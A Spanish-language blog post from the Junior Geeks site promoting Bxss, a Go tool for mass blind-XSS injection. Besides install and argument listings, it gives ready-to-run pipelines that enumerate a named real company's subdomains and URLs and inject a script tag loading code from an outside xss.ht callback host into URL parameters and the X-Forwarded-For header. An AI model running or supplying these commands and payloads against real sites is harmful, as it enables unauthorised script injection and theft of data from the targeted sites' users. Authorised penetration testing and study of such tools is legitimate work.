Bxss una herramienta Inyección Blind XSS
Bxss una herramienta Inyección Blind XSS
Junior Geeks·
Hacking y Pentesting
·1 Minuto de lectura

Bxss: Una Herramienta de Inyección Blind XSS

Bxss es una herramienta de inyección Blind XSS (Blind XSS Injector) realmente rápido y fácil de configurar, escrito en Go.

Una herramienta Blind XSS Injector

screenshot Bxss
screenshot Bxss

Características

  • Inyecta cargas útiles Blind XSS en cabeceras personalizadas
  • Inyecta cargas útiles Blind XSS en los parámetros
  • Utiliza diferentes métodos de solicitud (PUT, POST, GET, OPTIONS) todos a la vez
  • Encadenamiento de herramientas (Tool Chaining)
  • Muy rápido.
  • Fácil de configurar

Instalar

$ go get -u github.com/ethicalhackingplayground/bxss

Argumentos

          ____
         |  _ \
         | |_) |_  _____ ___
         |  _ <\ \/ / __/ __|
         | |_) |>  <\__ \__ \
         |____//_/\_\___/___/


        -- Coded by @z0idsec --
  -appendMode
        Append the payload to the parameter
  -concurrency int
        Set the concurrency (default 30)
  -header string
        Set the custom header (default "User-Agent")
  -parameters
        Test the parameters for blind xss
  -payload string
        the blind XSS payload

Blind XSS en parámetros

$ subfinder uber.com | gau | grep "&" | bxss -appendMode -payload '"><script src=https://hacker.xss.ht></script>' -parameters

Blind XSS en X-Forwarded-For (XFF) Header

$ subfinder uber.com | gau | bxss -payload '"><script src=https://z0id.xss.ht></script>' -header "X-Forwarded-For"
Etiquetas
2 1 1 1

🤞 ¡El Gran Hermano te vigila, pero sabemos cómo detenerlo!

¡No enviamos spam! Lee nuestra Política de Privacidad para más información.

Junior Geeks
Junior Geeks es un colectivo de profesionales de la ciberseguridad y hacking ético con certificaciones de élite como OSCP (Offensive Security Certified Professional) y CEH (Certified Ethical Hacker).Nuestra misión en esgeeks.com es democratizar el conocimiento, proporcionando trucos y guías prácticas sobre sistemas operativos, seguridad y el mundo digital en general. Con más de una década combinada de experiencia, nuestro objetivo es darte las herramientas para que tú tengas el control.
Relacionado

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.

Mi Carro Close (×)

Tu carrito está vacío
Ver tienda